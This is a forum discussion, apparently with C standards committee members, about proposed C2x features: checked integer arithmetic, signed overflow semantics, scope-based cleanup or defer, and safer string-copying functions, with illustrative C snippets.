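For reference, a sketch of how the heterogeneous builtins get used in practice (GCC 5+ and Clang; the wrapper name here is just for illustration):

```c
#include <stdbool.h>

/* __builtin_add_overflow computes the mathematically exact sum of its
   first two arguments (which may have different integer types), stores
   it in *out, and returns true if the result did NOT fit in out's type.
   Here the operands are long but the result is a short. */
bool add_fits_in_short(long a, long b, short *out) {
    return !__builtin_add_overflow(a, b, out);  /* true on success */
}
```

Because the builtin reasons about the infinitely precise result, no intermediate conversion of `a` or `b` can silently truncate, which is exactly the class of bug the homogeneous forms invited.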


We've been discussing a paper on this (http://www.open-std.org/jtc1/sc22/wg14/www/docs/n2466.pdf) at recent meetings and it's been fairly well-received each time, but not adopted for C2x as of yet.


It feels like it would be a real shame to standardize something that gives up the power of the Clang/GCC heterogeneous checked operations. We added them in Clang precisely because the original homogeneous operations (__builtin_smull_overflow, etc) led to very substantial correctness bugs when users had to pick a single common type for the operation and add conversions. Standardizing homogeneous operations would be worse than not addressing the problem at all, IMO. There's a better solution, and it's already implemented in two compilers, so why wouldn't we use it?

The generic heterogeneous operations also avoid the identifier blowup. The only real argument against them that I see is that they are not easily implementable in C itself, but that's nothing new for the standard library (and should be a non-goal, in my not-a-committee-member opinion).

Obviously, I'm not privy to the committee discussions around this, so there may be good reasons for the choice, but it worries me a lot to see that document.


>the original homogeneous operations (__builtin_smull_overflow, etc) led to very substantial correctness bugs when users had to pick a single common type for the operation and add conversions.

Hi Stephen, thank you for bringing this to our attention. David Svoboda and I are now working to revise the proposal to add a supplemental proposal to support operations on heterogeneous types. We are leaning toward proposing a three-argument syntax, where the 3rd argument specifies the return type, like:

    ckd_add(a, b, T)
where a and b are integer values and T is an integer type, in addition to the two-argument form

    ckd_add(a, b)
(Or maybe the two-argument and three-argument forms should have different names, to make it easier to implement.)


Glad to hear it, looking forward to seeing what you come up with! The question becomes, once you have the heterogeneous operations, is there any reason to keep the others around (my experience is that they simply become a distraction / attractive nuisance, and we're better off without them, but there may be use cases I haven't thought of that justify their inclusion).


When David and I are done revising the proposal, we would like to send you a copy. If you would be interested in reviewing, can you please let us know how to get in touch with you? David and I can be reached at {svoboda,weklieber} @ cert.org.

>once you have the heterogeneous operations, is there any reason to keep the others around

The two-argument form is shorter, but perhaps that isn't a strong enough reason to keep it. Also, requiring a redundant 3rd argument can provide an opportunity for mistakes to happen if it gets out of sync with the types of the first two arguments.

As for the non-generic functions (e.g., ckd_int_add, ckd_ulong_add, etc.), we are considering removing them in favor of having only the generic function-like macros.


Being brutal heterodox: STOP WRITING SIGNED ARITHMETIC.

Your code assumes that negating a negative value is positive. Your division check forgot about INT_MIN / -1. Your signed integer average is wrong. You confused bitshift with division. etc. etc. etc.

Unsigned arithmetic is tractable and should be treated with caution. Signed arithmetic is terrifying and should be treated with the same PPE as raw pointers or `volatile`.

This applies if arithmetic maps to CPU instructions, but not to Python or Haskell or etc. If you have automatic bignums, signed arithmetic is of course better.
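To make a couple of those pitfalls concrete, here is a sketch of checked helpers (the names are mine) for the two cases called out above, since -INT_MIN and INT_MIN / -1 both overflow on two's-complement machines:

```c
#include <limits.h>
#include <stdbool.h>

/* -INT_MIN is not representable as an int, so it must be rejected
   before the negation is performed. */
bool checked_negate(int x, int *out) {
    if (x == INT_MIN)
        return false;
    *out = -x;
    return true;
}

/* Division overflows only for INT_MIN / -1; the zero-divisor check
   alone (the common mistake) is not enough. */
bool checked_divide(int a, int b, int *out) {
    if (b == 0)
        return false;
    if (a == INT_MIN && b == -1)
        return false;
    *out = a / b;
    return true;
}
```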


> Now that C2x plans to make two's complement the only sign representation, is there any reason why signed overflow has to continue being undefined behavior?

I presume you'd want signed overflow to have the usual 2's-complement wraparound behavior.

One problem with that is that a compiler (probably) couldn't warn about overflows that are actually errors.

For example:

    int n = INT_MAX;
    /* ... */
    n++;
With integer overflow having undefined behavior, if the compiler can determine that the value of n is INT_MAX it can warn about the overflow. If it were defined to yield INT_MIN, then the compiler would have to assume that the wraparound was what the programmer intended.

A compiler could have an option to warn about detected overflow/wraparound even if it's well defined. But really, how often do you want wraparound for signed types? In the code above, is there any sense in which INT_MIN is the "right" answer for any typical problem domain?


> In the code above, is there any sense in which INT_MIN is the "right" answer for any typical problem domain?

There is no answer other than INT_MIN that would be right and make sense, i.e., that respects the natural properties of the + operator (associativity, commutativity). Thus, for want of another possibility, INT_MIN is precisely the right answer to your code.

I read your code and it seems to me very clear that INT_MIN is exactly what the programmer intended.


> I read your code and it seems to me very clear that INT_MIN is exactly what the programmer intended.

Well, I'm the author and that's not what I intended.

I used INT_MAX as the initial value because it was a simple example. Imagine a case where the value happens to be equal to INT_MAX, and then you add 1 to it.

The fact that no result other than INT_MIN makes sense doesn't imply that INT_MIN does make sense. Saturation (having INT_MAX + 1 yield INT_MAX) or reporting an error seem equally sensible. We don't know which behavior is "correct" without knowing anything about the problem domain and what the program is supposed to do.

A likely scenario is that the programmer didn't intend the computation to overflow at all, but the program encountered input that the programmer hadn't anticipated.

INT_MAX + 1 commonly yields INT_MIN because typical hardware happens to work that way. It's not particularly meaningful in mathematical terms.

As for "natural properties", it violates "n + 1 > n". C integers are not, and cannot be, mathematical integers (unless you can restrict values to the range they support).


Could we instead just have standard-defined integer types which saturate or trap on overflow?

Sometimes you're writing code where it really, really matters and you're more than willing to spend the extra cycles for every add/mul/etc. Having these new types as a portable idiom would help.
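For illustration, saturating arithmetic can already be written portably as a function; the semantics below (clamp to INT_MAX/INT_MIN) are my assumption about what such a type would do:

```c
#include <limits.h>

/* Saturating signed add: clamps instead of overflowing. The comparisons
   are arranged so no intermediate expression can itself overflow. */
int sat_add(int a, int b) {
    if (a > 0 && b > INT_MAX - a)
        return INT_MAX;   /* would overflow upward */
    if (a < 0 && b < INT_MIN - a)
        return INT_MIN;   /* would overflow downward */
    return a + b;
}
```

A standard-defined type would let the compiler emit hardware saturating instructions where they exist, instead of the branches above.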


There was a proposal for a checked integer type that you might want to look at:

N2466 2020/02/09 Svoboda, Towards Integer Safety

http://www.open-std.org/jtc1/sc22/wg14/www/docs/n2466.pdf

The committee asked the proposers for further work on this effort.

Integer types that saturate are an interesting idea. Because signed integer overflow is undefined behavior, implementations are not prohibited from implementing saturation or trapping on overflow.


Eh? I thought that would only be "legal" if it was specified to be implementation-defined behavior. Which would, frankly, be perfectly good. But since it is specified as undefined behavior, programmers are forbidden to use it, and compilers assume it doesn't happen/doesn't exist.

The entire notion that "since this is undefined behavior it does not exist" is the biggest fallacy in modern compilers.


The rule is: If you want your program to conform to the C Standard, then (among other things) your program must not cause any case of undefined behavior. Thus, if you can arrange so that instances of UB will not occur, it doesn't matter that identical code under different circumstances could fail to conform. The safest thing is to make sure that UB cannot be triggered under any circumstances; that is, defensive programming.


Where does that myth come from!? According to the authors of C89 and C99, Undefined Behavior was intended to, among other things, "identify areas of conforming language extension" [their words]. Code which relies upon UB may be non-portable, but the authors of the Standard expressly did not wish to demean such code; that is why they separated out the terms "conforming" and "strictly conforming".


I don't think it's a myth so much as a misunderstanding of terminology. If an implementation defines some undefined behavior from the standard, it stops being undefined behavior at that point (for that implementation) and is no longer something you need to avoid except for portability concerns.

You're exactly right that this is why there is a distinction between conforming and strictly conforming code.


The problem is that under the modern interpretation, even if some parts of the Standard and a platform's documentation would define the behavior of some action, the fact that some part of the Standard would regard an overlapping category of constructs as invoking UB overrides everything else.


I could imagine misguided readings of some coding standard advice that would lead to that interpretation, but it's still not an interpretation that makes sense to me.

Implementations define undefined behavior all the time and users rely on it. For instance, POSIX defines that you can convert an object pointer into a function pointer (for dlsym to work), or implementations often rely on offsets from a null pointer for their 'offsetof' macro implementation.
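For instance, the classic null-pointer-based 'offsetof' looks something like this (a sketch; it is exactly the kind of formally-undefined construct that an implementation chooses to define for itself):

```c
#include <stddef.h>

/* Classic implementation trick: form a member address from a null
   pointer and measure its offset. Formally UB per the Standard, but
   well-defined on the implementations that ship it; portable code
   should use <stddef.h>'s offsetof (or __builtin_offsetof). */
#define MY_OFFSETOF(type, member) ((size_t)&(((type *)0)->member))

struct packet { char tag; int len; };
```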


Such an interpretation would be the only way to justify the way the maintainers of clang and gcc actually behave in response to complaints about their compilers' "optimizations".


Beside optimization (as others have pointed out), disallowing wrapping of signed values has the important safety benefit that it permits run-time (and compile-time) detection of arithmetic overflow (e.g. via -fsanitize=signed-integer-overflow). If signed arithmetic were defined to wrap, you could not enable such checks without potentially breaking existing correct code.


Not a question, a request: Please make __attribute__((cleanup)) or the equivalent feature part of the next C standard.

It's used by a lot of current software in Linux, notably systemd and glib2. It solves a major headache with C error handling elegantly. Most compilers already support it internally (since it's required by C++). It has predictable effects, and no impact on performance when not used. It cannot be implemented without help from the compiler.
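For readers unfamiliar with it, a sketch of the typical usage pattern (GCC/Clang extension; the helper and function names here are mine):

```c
#include <stdlib.h>
#include <string.h>

/* cleanup(f) arranges for f(&var) to run when var goes out of scope,
   on every exit path, in reverse declaration order. */
static void free_ptr(char **p) { free(*p); }

int demo(void) {
    __attribute__((cleanup(free_ptr))) char *buf = malloc(16);
    if (buf == NULL)
        return -1;      /* nothing allocated yet, nothing to clean up */
    strcpy(buf, "hello");
    if (buf[0] != 'h')
        return 1;       /* early return: buf is still freed automatically */
    return 0;           /* normal return: buf freed here too */
}
```

The appeal is that the error-handling paths need no explicit free/goto-cleanup ladder, which is where leaks usually creep in.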


My idea was to add something like the GoLang defer statement to C (as a function with some special compiler magic). The following is an example of how such a function could be used to cleanup allocated resources regardless of how a function returned:

  int do_something(void) {
    FILE *file1, *file2;
    object_t *obj;
    file1 = fopen("a_file", "w");
    if (file1 == NULL) {
      return -1;
    }
    defer(fclose, file1);
  
    file2 = fopen("another_file", "w");
    if (file2 == NULL) {
      return -1;
    }
    defer(fclose, file2);

    obj = malloc(sizeof(object_t));
    if (obj == NULL) {
      return -1;
    }
    // Operate on allocated resources
    // Clean up everything
    free(obj);  // this could be deferred too, I suppose, for symmetry 
  
    return 0;
  }


Golang gets this wrong. It should be scope-level not function-level (or perhaps there should be two different types, but I have never personally had a need for a function-level cleanup).

Edit: Also please review how attribute cleanup is used by existing C code before jumping into proposals. If something is added to C2x which is inconsistent with what existing code is already doing widely, then it's no help to anyone.


Yes, we have discussed adding this feature at scope level. A not entirely serious proposal was to implement it as follows:

  #define DEFER(a, b, c)  \
     for (bool _flag = true; _flag; _flag = false) \
     for (a; _flag && (b); c, _flag = false)

  int fun() {
     DEFER(FILE *f1 = fopen(...), (NULL != f1), mfclose(f1)) {
       DEFER(FILE *f2 = fopen(...), (NULL != f2), mfclose(f2)) {
         DEFER(FILE *f3 = fopen(...), (NULL != f3), mfclose(f3)) {
             ... do something ...
         }
       }
     }
  }
We are also looking at the attribute cleanup. Sounds like you should be involved in developing this proposal?


Apropos of this, I'll toss in: please support do-after statements (and also let statements).

  do foo(); _After bar();
  /* exactly equivalent to (with gcc ({})s): */
  ({ bar(); foo(); });
  #define DEFER(a, b, c) \
    _Let(a) if(!b) {} else do {c;} _After
(This is in fact a entirely serious proposal, though I don't actually expect it to happen.)


Yes, I'll ask around in Red Hat too, see if we can get some help with this.


Would it make sense for defer to operate on a scope-block, sort of like an if/do/while/for block instead?

That would allow us to write:

   defer close(file);
or:

   defer {
      release_hardware();
      close(port);
   }
I feel like that syntax fits very nicely with other parts of C, and could even potentially lend itself well to some very subtle/creative uses.

I feel like a very C-like defer would:

   - Trigger at the exit of the scope-level where it was declared.

   - Be able to defer a single statement, or a scope-block.

   - Be nestable, since a defer statement just runs its target
     scope-block at the exit of the scope-block where it's defined.

   - Run successive defer statements in LIFO order, allowing later
     defer statements to still use resources that will be cleaned up
     by the earlier ones.


Cleanup on function return is not enough, it needs to be scope exit. We're using this for privilege raising/dropping (example posted above) and also mutex acquisition/release. Both of these really "want" it on the scope level.


Go-like defer() is easily implementable for C using the asm() keyword. Here's an example of how it can be done for x86: https://gist.github.com/jart/aed0fd7a7fa68385d19e76a63db687f...


That's quite an achievement, but you've got to realise that hacks which overwrite the stack return address are not maintainable and likely wouldn't work except for a narrow range of compilers (and even specific versions of those compilers with specific options). It also won't work with stack hardening.

Also it's function-level (like golang) not scope-level (like attribute cleanup). As argued elsewhere in this thread, golang got this wrong.

Also also, overwriting the return address on the stack kills internal CPU optimizations that both Intel and AMD do for branch prediction.


Maintainable is a point of view. Works fine w/ -fstack-protector for me.

Saying it supports a narrow range of compilers is like saying US two-party system only supports a narrow range of registered voters. Libertarians and Greens absolutely deserve inclusion. They can vote but the system doesn't go out of its way to make life as exciting as possible for them. The above Gist caters to GCC/Clang. Folks who use MSVC, Watcom, etc. absolutely deserve to be supported. The Clang compiled modules can be run through something like objconv and linked into their apps.

Not convinced about scope-level. Supporting docs would help. Sounds like you just want mutex. I'm not sure if I can comment since I can't remember if I've ever written threaded code in C/C++. I would however sheepishly suggest anyone wanting that consider Java due to (a) literally has a class named Phaser come on so cool (b) postmortems I read by webmaster where I once worked.

Not concerned about microoptimizations. All I really wanted was to be able to say stuff like

    const char *s = gc(xasprintf("%s%s", a, b));
Also folks who use those new return trapping security flags might see the branch predictor side-effects as a benefit. Could this really be GC for C with Retpoline for free? I don't know. You decide.


Funny you should mention that, as that feature has come up recently in mailing list discussions. We have not seen an actual proposal for adopting it yet, but features with similar semantics are being discussed as a possible idea (no promises).

FWIW, I don't think it would wind up being spelled with attribute syntax because we would likely want programmers to have a guarantee that the cleanup will happen (and attributes can be ignored by the implementation).


Hopefully it'd at least be syntactically similar, so we can have an

  #ifdef __STDC_CLEANUP__
  #define my_cleanup(func) stdc_cleanup(func)
  #else
  #define my_cleanup(func) __attribute__((cleanup(func)))
  #endif
i.e. it would require that it at least goes in the same places as an attribute.


I believe the last proposal was in 2008 (ignore the try..finally stuff here): http://www.open-std.org/jtc1/sc22/wg14/www/docs/n1298.pdf

So I guess it needs someone to take that and update it, also to pull up a full list of current Linux software which is using this feature (which as I say these days is a surprising amount).


Here's our usage: https://github.com/FRRouting/frr/blob/master/lib/privs.h#L14...

  #define frr_with_privs(privs)                                                  \
          for (struct zebra_privs_t *_once = NULL,                               \
                                    *_privs __attribute__(                       \
                                            (unused, cleanup(_zprivs_lower))) =  \
                                            _zprivs_raise(privs, __func__);      \
               _once == NULL; _once = (void *)1)
This gives us a block construct that guarantees elevated privileges are dropped when the block is done:

  frr_with_privs(privs) {
    ... whatever ...
    break;  /* exit block, drop privileges */
    return; /* return, drop privileges */
  }


We have a nice macro for acquiring locks that only applies to the scope:

https://github.com/libguestfs/nbdkit/blob/e58d28d65bfea3af36...

You end up with code like this:

https://github.com/libguestfs/nbdkit/blob/e58d28d65bfea3af36...

It's so useful to be able to be sure the lock is released on all return paths. Also because it's scope-level you can scope your locks tightly to where they are needed.


We use it extensively in our proprietary codebases as well, FWIW. Not real open data for me to point to, but: a few million lines of C, and a handful of billion USD in revenue. If that helps weigh in on "yes, please standardize this common practice."


The standard string library is still pretty bad. This would have been a much better addition for safe strcpy.

Safe strcpy

    char *stecpy(char *d, const char *s, const char *e)
    {
        while (d < e && *s)
            *d++ = *s++;
        if (d < e)
            *d = '\0';
        return d;
    }

    int main(void) {
        char buf[64];
        char *ptr, *end = buf + sizeof(buf);

        ptr = stecpy(buf, "hello", end);
        ptr = stecpy(ptr, " world", end);
        return 0;
    }

Existing solutions are still error-prone, requiring continual recalculation of buffer len after each use in a long sequence, when the only thing that matters is where the buffer ends, which is effectively a constant across multiple calls.

What are the chances of getting something like this added to the standard library?


For what it's worth, I personally like this approach, because there are some cases in which it requires less arithmetic in order to be used correctly. And it lends itself better to some forms of static analysis, for similar reasons, in the following sense:

There is the problem of detecting that the function overflows despite being a “safe” function. And there is the problem of precisely predicting what happens after the call, because there might be an undefined behavior in that part of the execution. When writing to, say, a member of a struct, you pass the address of the next member and the analyzer can safely assume that that member and the following ones are not modified. With a function that receives a length, the analyzer has to detect that if the pointer passed points 5 bytes before the end of the destination, the accompanying size is 5, if the pointer points 4 bytes before the end the accompanying size is 4, etc.

This is a much more difficult problem, and as soon as the analyzer fails to capture this information, it appears that the safe function a) might not be called safely and b) might overwrite the following members of the struct.

a) is a false positive, and b) generally implies tons of false positives in the remainder of the analysis.

(In this discussion I assume that you want to allow a call to a memory function to access several members of a struct. You can also choose to forbid this, but then you run into a different problem, which is that C programs do this on purpose more often than you'd think.)


There are many improved versions of string APIs out there, too many in fact to choose from, and most suffer from one flaw or another, depending on one's point of view. Most of my recent proposals to incorporate some that do solve some of the most glaring problems, that have been widely available for a decade or more, and that are even part of other standards (POSIX), have been rejected by the committee. I think only memccpy, strdup, and strndup were added for C2X. (See http://www.open-std.org/jtc1/sc22/wg14/www/docs/n2349.htm for an overview.)


> Most of my recent proposals [...] have been rejected by the committee.

Does anyone have insight on why?


memccpy is a very welcome addition in the front of copying strings; what else were you thinking of proposing?


I recently looked at a number of string copying functions, as well as came up with an API a bit similar to yours: https://saagarjha.com/blog/2020/04/12/designing-a-better-str... (mine indicates overflow more clearly). memccpy, which is coming in C2X, makes designing these kinds of things finally possible.
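For example, a truncation-aware string copy built on memccpy might look like this (a sketch; the return convention is my own choice, and the feature-test macro assumes a POSIX system, where memccpy lives today):

```c
#define _XOPEN_SOURCE 700   /* expose POSIX memccpy */
#include <string.h>

/* memccpy stops after copying the '\0' and returns a pointer just past
   it, or NULL if the terminator did not fit within n bytes. Returns the
   number of bytes written including the terminator, or 0 on truncation
   (in which case dst is still NUL-terminated). */
size_t copy_str(char *dst, const char *src, size_t n) {
    if (n == 0)
        return 0;
    char *end = memccpy(dst, src, '\0', n);
    if (end == NULL) {          /* truncated */
        dst[n - 1] = '\0';
        return 0;
    }
    return (size_t)(end - dst);
}
```

Unlike strncpy, this never zero-fills the tail of the buffer, and unlike strlcpy it never scans past the part of the source it actually copies.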


What's wrong with:

    p += sprintf(p, "hello");
    p += sprintf(p, "world");


Well, that should be `snprintf()` to start with, but even with that, there are issues. The return type of `snprintf()` is `int`, so it can return a negative value if there was some error, so you have to check for that case. That out of the way, a positive return value is (and I'm quoting from the man page on my system) "[i]f the output was truncated due to this limit then the return value is the number of characters which would have been written to the final string if enough space had been available." So to safely use `snprintf()` the code would look something like:

    int size = snprintf(NULL,0,"some format string blah blah ...");
    if (size < 0) error();
    if (size == INT_MAX)
      error(); // because we need one more byte to store the NUL byte
    size++;
    char *p = malloc(size);
    if (p == NULL)
      error();
    int newsize = snprintf(p,size,"some format string blah blabh ... ");
    if (newsize < 0) error();
    if (newsize > size)
    {
      // ... um ... we still got truncated?
    }
Yes, using NULL with `snprintf()` if the size is 0 is allowed by C99 (I just checked the spec).

One thing I've noticed about the C standard library is that it seems averse to functions allocating memory (outside of `malloc()`, `calloc()` and `realloc()`). I wonder if this has something to do with embedded systems?
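For what it's worth, an allocating printf can be layered on top of vsnprintf in a dozen lines, which is roughly what the POSIX/glibc asprintf extension does (the name aprintf here is made up):

```c
#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>

/* Allocating printf: one vsnprintf call to measure (C99 permits a NULL
   buffer with size 0), a malloc, and a second call to fill the buffer.
   Returns NULL on format error or allocation failure. */
char *aprintf(const char *fmt, ...) {
    va_list ap, ap2;
    va_start(ap, fmt);
    va_copy(ap2, ap);               /* the list is consumed twice */
    int n = vsnprintf(NULL, 0, fmt, ap);
    va_end(ap);
    if (n < 0) {
        va_end(ap2);
        return NULL;
    }
    char *p = malloc((size_t)n + 1);
    if (p != NULL)
        vsnprintf(p, (size_t)n + 1, fmt, ap2);
    va_end(ap2);
    return p;
}
```

The caller frees the result with free(), which is presumably part of why the committee is reluctant: every allocating interface bakes in a particular allocator.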


Not just embedded systems, also OSes. C's standard library should generally work without the existence of a heap. After all, you have to create the heap using C before you can allocate from it.


malloc is a required part of ISO C, though.


Functions like malloc are only required for hosted implementations. Many operating systems are built using freestanding implementations.

Further, on many platforms, one should avoid using malloc() unless portability is more important than performance or safety. Some operating systems support useful features like the ability to allocate objects with different expected lifetimes in different heaps, so as to help avoid fragmentation, or to arrange for allocations that a program can survive without to fail while there is still enough memory to handle critical allocations. Any library that insists upon using "malloc()" will be less than ideal for use with any such operating system.


Also, the return type being int means that there's a limit to the length of your string…


Perhaps you meant snprintf. But snprintf can fail on allocation failure, fail if the buffer size is > INT_MAX, and in general isn't very lightweight--last time I checked glibc, snprintf was a thin wrapper around the printf machinery and is not for the faint of heart--e.g. initializing a proxy FILE object, lots of malloc interspersed with attempts to avoid malloc by using alloca.

It can also fail on bad format specifiers--not directly relevant here except that it forces snprintf to have a signed return value, and mixing signed (the return value) and unsigned (the size limit parameter) types is usually bad hygiene, especially in interfaces intended to obviate buffer overflows.


That could lead to buffer overflow.


When I wrote that, I had in mind the observation about continued recalculation of buffer len. My suggestion has no such thing. It looks so good that I imagine this was probably how it was intended to be used. With that in mind, isn't it the user's job to know the size of the buffers he's using? Doesn't expecting that the function know about buffer size go against the single responsibility principle?

I'm new to C, in case you couldn't tell.


The problem in practice is that you do not write “hello” and “world” to the destination buffer. You write data that is computed more or less directly from user inputs. Often a malicious user.

So the user only needs to find a way to make the data longer than the developer expected. This may be very simple: the developer may have written a screensaver to accept 20 characters for a password, because who has a longer password than this? Everyone knows that only the first 8 characters matter anyway. (This may have been literally true a long time ago, I think, although it's terrible design. Anyway only 8 characters of hash were stored, so in a sense characters after the first 8 did not buy you as much security as the first 8, even if it was not literally true.)

And this is how there were screensavers that, when you input ~500 characters into the password field, would simply crash and leave the applications they were hiding visible and ready for user input. This is an actual security bug that has happened in actual Unix screensavers. The screensavers were written in C.

And long story short, we have been having the exact same problem approximately once a week for the last 25 years. Many people agree that it is urgent to finally fix this, especially as the consequences are getting worse and worse as computers are more connected.

One solution that some favor is functions that make it easier not to overflow buffers because you tell them the size of the buffer instead of trying to guess in advance how much is enough for all possible data that may be written in the buffer. This is the thing being discussed in this thread. The function sprintf is not a contender in this discussion. The function snprintf could be, if used wisely, but it is a bit unwieldy and the OP's proposal has a specific advantage: you compute the end pointer only once, because this is the invariant.


An analogous seprintf() would probably be a good thing to add too, where the buffer end is passed in instead of a buffer length. I would still have it return a pointer to the end of what was copied. Anyone can calculate the length if they need to, by subtracting the original pointer from the returned pointer.

    char *seprintf(char *str, char *end, const char *format, ...);


I think sprintf and gets can be perfectly secure interfaces. The standard just needs to specify them in a way that causes overflows to raise signals. This is probably more for POSIX and UNIX, since I think it requires the concept of memory mappings. For example:

Start by specifying that memcpy goes by increasing address. This can be done by specifying that no pages to be written by memcpy can be written to until after all pages with lower addresses have been accessed by memcpy. (it is OK to read forwards and then write backwards; the first access must not skip pages)

Next, specify sprintf and gets in terms of memcpy. The output is written as if by memcpy.

The user may then place a PROT_NONE page of memory after the buffer. Since the pages are being accessed by address order, the PROT_NONE page will safely stop the buffer overflow. The user can have a signal handler deal with the problem. It can exit or map in more memory. If we require sprintf and gets to be async-signal-safe, then the signal handler can also siglongjmp out of the problem.


Surely you don’t expect every stack buffer to have a hard page placed after it to protect from overflows?


> With that in mind, isn't it the user's job to know the size of the buffers he's using?

Yes. The user knows the size of his buffer, and then passes that knowledge on to the string constructing functions so that they do not overflow the buffer.

> Doesn't expecting that the function know about buffer size go against the single responsibility principle?

What's single responsibility again? "Execute this one assembly instruction"?

What you want from standard library functions is, usually, "construct a string into this buffer (whose size is N)."


It looks like you'd be dereferencing the pointer p, but you'd also need to make sure that what p points to has enough memory.


Open up WG14 mailing list for non-members?

It's hard to appreciate what's going on at WG14 (or take part) when you can see the results only from afar, with none of the surrounding discussion.

I recently read Jens Gustedt's blog on C2x where he casually recommended this as a way to get involved: "The best is to get involved in the standard’s process by adhering to your national standards body, come to the WG14 meetings and/or subscribing to the committee’s mailing list."

Afaict (from browsing the wg14 site), the mailing list and its archives are not open to access.

https://webcache.googleusercontent.com/search?q=cache:TnEGL4...

EDIT: In general, how is one supposed to approach wg14 with ideas or need for clarification on the standard's wording / interpretation?


> In general, how is one supposed to approach wg14 with ideas or need for clarification on the standard's wording / interpretation?

I'm currently working on an update to the committee website to clarify exactly this sort of thing! Unfortunately, the update is not live yet, but it should hopefully be up Soon™.

Currently, clarifications and ideas both require you to find someone on the committee to ask the question or champion your proposal for you. We hope to improve this process as part of this website update to make it easier for community collaboration.


In general, the committee accepts what we used to call "defect reports" (now something like "requests for improvement"), assigns them "WG14 series" sequence numbers, and upon requests for "floor time" schedules meeting discussions. Occasional votes are taken, which might trigger modifications to the draft standard. At some point, the committee decides that the updated draft standard is ready for public review, and the various national representatives deal with review comments. All this starts with proposal documents in "WG14 series" form.


Agreed. I would like to get involved, but I don't see any reasonable way for me to do that as an individual.


If an old timer who used to be good with C wanted to use C again, would they have to learn a whole bunch of weird new stuff or could they pretty much use it like they did back in the stone age (i.e., the 20th century)?

Back in the '80s and '90s I was pretty good at C. I don't think there was anything about the language or the compilers that I did not understand. I used C to write real time multitasking kernels for embedded systems, device drivers and kernel extensions for Unix, Windows, Mac, Netware, and OS/2. I did a Unix port from swapping hardware to paging hardware, rewriting the processes and memory subsystems. I tricked a friend into writing a C compiler. I could hold my own with the language lawyers on comp.lang.c.

Somewhere in there I started using C++, but only as a C with more flexible strings, constructors, destructors, and "for (int i = ...)", and later added STL containers to that.

Sometime in the 2000s, I ended up spending more and more time on smaller programs that were mostly processing text, and Perl became my main tool. Also I ended up spending a lot of time helping out less experienced people at work who were doing things in PHP, or JavaScript, or Java. My C and C++ trickled to nothing.

I've occasionally looked at modern C++, but it is so different from what I was doing back in '90s or even early '00s I sometimes have to double check that I'm actually looking at C++ code.

Is modern C like that, or is it still at its core the same language I used to know well?


I'd put it this way -- as someone who writes both C and C++ and has for a long while, I find that the difference between "best practice" C89 and C17 code is not as wide as the difference between "best practice" C++98 and C++17 code. However, this is subjective and may be specific to what kinds of projects I work on, so YMMV.


C17 doesn't look much different than C89. If you are used to K&R C there may be some adjustment but I would expect it to be manageable.

What might perhaps be more challenging is adjusting to the changes in compilers. They tend to optimize code more aggressively and so writing code that closely follows the rules of the language (rather than making assumptions about the underlying hardware, even valid ones) is more important today than it was back in the 80's.


Given the above, it is worth pointing out that compilers are also much, much better at verification and useful warnings/errors. Back in the (very old) days, there was a motivation to cut down PCC (Portable C Compiler) and give birth to lint as a separate application (because cutting the compilation time was a greater priority). The current trend is completely the opposite: compilers are getting increasingly more powerful built-in static analyzers and sanitizers by default.

I think the lack of powerful tools in the 1990s-2000s contributed to the thought by some that C is 'difficult' in terms of safety. However, things have moved on.


As additional info,

> Although the first edition of K&R described most of the rules that brought C's type structure to its present form, many programs written in the older, more relaxed style persisted, and so did compilers that tolerated it. To encourage people to pay more attention to the official language rules, to detect legal but suspicious constructions, and to help find interface mismatches undetectable with simple mechanisms for separate compilation, Steve Johnson adapted his pcc compiler to produce lint [Johnson 79b], which scanned a set of files and remarked on dubious constructions.

-- https://www.bell-labs.com/usr/dmr/www/chist.html



The main editing needed to bring "old C" source code up to snuff using a "modern C" compiler is to make sure that the standard header-defined types are used. No more assuming that a lot of things are, by default, int type. A second, related editing pass is to make sure all functions are declared as prototypes, no longer K&R style; K&R style is slated to be deprecated by the next version of the Standard. (There are some rare uses for non-prototyped functions, but evidently the committee thinks there is more benefit in forcing prototypes.)


So the ISO committee breaks the backward compatibility of C on behalf of modernity... but there is C++, guys!

A little effort and you could make C deprecated. ;-)

This makes me think that there are as many C++ gurus as Go(ogle) gurus who want to kill C to be the new Java which brings you a bad coffee from a dirty kitchen.


> but evidently the committee thinks there is more benefit in forcing prototypes

Why?

Consider the following code:

    LetsReconsiderPriorities(n, A)
      int n, A[n];
    {
      return A[n + 1];
    }

    main() {
      static int A[1];
      return LetsReconsiderPriorities(1, A);
    }
Can anyone guess what clang/gcc complain about? They complain about K&R syntax, yet say nothing about the buffer overflow error. Thanks to modern arrays, the overflow can be said to clearly contradict the intentions of the program author. So why aren't compiler authors focusing on that? Rather than showing warnings that I'd say rightfully belong in lint? Note: Same is true with -Wall, [static n], and even [static 1]: compiler complains about language style and ignores real bugs.

I would estimate that roughly 15% of the issues / pull requests that get filed against C language projects are due to these linter errors that accumulated in compilers over the years, based on a quick glance at STB. https://github.com/nothings/stb/issues?q=warning (29 + 132.) / (156 + 794) It's a big obstacle to sharing C code with others. It'd be great if the C Language Committee could ask compiler authors to remove all these distracting warnings like "unused parameter" now that we have amazing tools like runtime sanitizers that deliver real results.

Also, have we considered addressing the prototype problem with the freedom to choose an ILP64 data model instead? How much do prototypes honestly matter in that case? DSO ABI compatibility might be an issue for Linux distros, but it doesn't concern all of us. Also not terribly concerned about 64-bit type promo since 16-bit is usually what fast DSP wants, and the language today doesn't make that easy.

Lastly consider that C was designed at a research laboratory. If there's one thing researchers love to do, it's what I like to call "yolo coding" which is perfectly valid use case of getting experimental / prototyping code written in a way where one needn't care too much about language formalities and best practices. It'd be great if the standards committee acknowledged that as being a legitimate use case (similar to how "high level assembler" is explicitly acknowledged), because future revisions of the language should ideally maintain as much of the original intentions as possible. See also: https://www.lysator.liu.se/c/dmr-on-noalias.html (Note: I think dmr goes too far here, but interesting bit of history to think about, now that everything that isn't char is implicitly noalias!)

In other words, let us choose. Please don't force us.


I'm sort of in the same boat, although I didn't do as much C. (And my interest in getting back into it is more hypothetical.)

Aside from understanding how the language itself has changed, maybe something else to put on the list is how to apply more modern programming practices in C.

In the 90s, I don't think I ever saw C code with unit tests. Any kind of automated testing was pretty rare. I've become convinced that testing in some form is a good thing. If I were going back to C, I'd want to understand the best way to go about that.

People also didn't care (or know) much about security back then. C has some obvious pitfalls (buffer overflows, etc.), and it is pretty important to know good ways to minimize risk. I'd want to understand best practices and techniques for this.

